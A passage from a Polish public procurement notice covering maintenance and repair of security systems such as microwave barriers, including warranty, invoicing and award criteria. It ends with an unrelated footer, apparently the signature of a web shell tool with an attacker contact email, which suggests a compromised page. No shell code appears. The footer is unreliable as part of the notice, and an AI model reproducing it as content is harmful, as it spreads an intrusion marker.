4. Wykonawca zobowiązany jest zapewnić unieszkodliwianie wymienionych  uszkodzonych elementów. 
5. Wykonawca zobowiązany jest do utrzymania obszaru na którym są zamontowane bariery mikrofalowe w stanie zapewniającym im prawidłową pracę.
6. Ilość i typ urządzeń podlegających konserwacji zgodnie z załącznikiem nr 6 do SIWZ.
7. Wszelkie usterki, wadliwe działanie oraz prace serwisowe spowodowane zaniedbaniami konserwacyjnymi będą usuwane na koszt Wykonawcy.
8. Wszystkie koszty związane z usługą konserwacji i przeglądów wchodzą 
w zakres przedmiotowego zamówienia.
9. W przypadku wystąpienia konieczności naprawy systemów objętych konserwacją i serwisem w zakres przedmiotowego zamówienia wchodzi usługa naprawy, oprócz kosztów za urządzenia podlegające wymianie. W takiej sytuacji Wykonawca będzie zobowiązany do przedstawienia Zamawiającemu do akceptacji koszt urządzeń uznanych za niesprawne podczas wykonywania prac konserwacyjnych.
10. W przypadku wystąpienia konieczności naprawy systemów, wykonawca przedstawi zamawiającemu kosztorys elementów (osobie wyszczególnionej w umowie) niezbędnych do usprawnienia systemu do akceptacji.
11. Wykonawca udzieli dwuletniej gwarancji na wymienione urządzenia i elementy wspomagające ochronę.
12. Po konserwacji Wykonawca obciąży Zamawiającego fakturą po uprzednim protokólarnym odbiorze wykonanej usługi.
13. Zamawiający zastrzega sobie możliwość zmniejszenia zakresu przedmiotu zamówienia.
14. Wymagana jest należyta staranność przy realizacji zobowiązań umowy.
15. Ustalenia i decyzje dotyczące wykonywania zamówienia podejmowane będą przez Zamawiającego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.61.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Referencje - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com